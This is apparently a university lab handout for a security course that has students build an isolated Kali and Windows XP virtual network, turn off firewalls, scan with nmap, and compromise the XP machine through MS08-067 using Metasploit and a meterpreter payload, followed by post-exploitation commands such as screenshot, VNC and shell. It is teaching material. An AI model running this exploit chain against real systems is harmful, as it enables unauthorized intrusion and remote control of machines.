InClass_ Assignments_5
You should be submitted in Backboard CTEC350\ InClass_ Assignments 5:
See: Due Date in Blackboard
You must include screen shot from your system clock which show today date and time you
are completing this assignment today. Also it is required screen shot are explain.
In this assignment we are going to get exposure to two things. The first is Metasploit it is a
popular tool used today for both legitimate and illegitimate tests of computer system defenses in
addition to tests of the patch levels of those systems. Second we will scan a network and exploit
vulnerability. In this exercise we will use the metasploit framework to show that a Windows XP
system is vulnerable toMS08-067.
Pre-Preparation of VMware workstation follow the screenshots as shown below:
- Click on Edit from the Top Panel and select Virtual Network Editor
- Click on Add Network
InClass_ Assignments_5
You should be submitted in Backboard CTEC350\ InClass_ Assignments 5:
See: Due Date in Blackboard - Select any of the network port you want to add from the drop down menu
- Make sure the settings are as shown in the below screenshot. You can change the IP Address
range as per your requirement. But we will leave it default.
InClass_ Assignments_5
You should be submitted in Backboard CTEC350\ InClass_ Assignments 5:
See: Due Date in Blackboard - Now change the Network Adapter in the required vms whom you want to be in the same
Internal Network. ( So our case it will be Kali 5 and Windows XP VMs)
Note: Make sure you turn-off the firewall in Windows XP Vm and in Kali. The command to turn
off the firewall in Kali is ufw disable. Also, in Kali you need to type: ifconfig eth0 up once you
have configured the setting above.
InClass_ Assignments_5
You should be submitted in Backboard CTEC350\ InClass_ Assignments 5:
See: Due Date in Blackboard
Follow the same steps for all Windows XP vm you want to add in the internal network.
Once done check the IP configuration so go in Windows XP machine ping Kali and do the
vice versa to make sure both Vms can ping each other.
Penetration Testing with Metasploit - Open Kali and Windows XP machine.
- Now open the command prompt in Kali 5 and type: msfconsole
- Now open another command prompt in Kali and type
nmap: (IP address of Windows XP vm) ex: nmap 192.168.1.72 –v and press Enter. - Now go back to the command prompt where you enter msfconsole and type:
Search ms08_067 - Now select the exploit and type: use exploit/windows/smb/ms08_067_netapi
- Now type: set payload windows/meterpreter/bind_tcp
- Now type: set RHOST 192.168.1.72 (replace it with your Windows XP vm IP address)
- Now type: exploit
- Now you are into Windows XP machine. Now at the meterpreter command prompt
Type:? it will give you all the option you can do. - Type: screenshot it will save it in the Windows XP desktop.
- Type: run vnc
- Type: background
- Type sessions –l (that’s L) you will see the active session.
- Type: sessions –i 1 (that’s 1)
- Type: shell
- Type: ipconfig and you will see IP address of Windows XP machine.
- Type: sysinfo you will see Windows XP machine information.
- Try to create a folder in Windows XP desktop through command-line with your name
and the course. Ex: John_Brown_CTEC_350
You are into Windows XP machine!
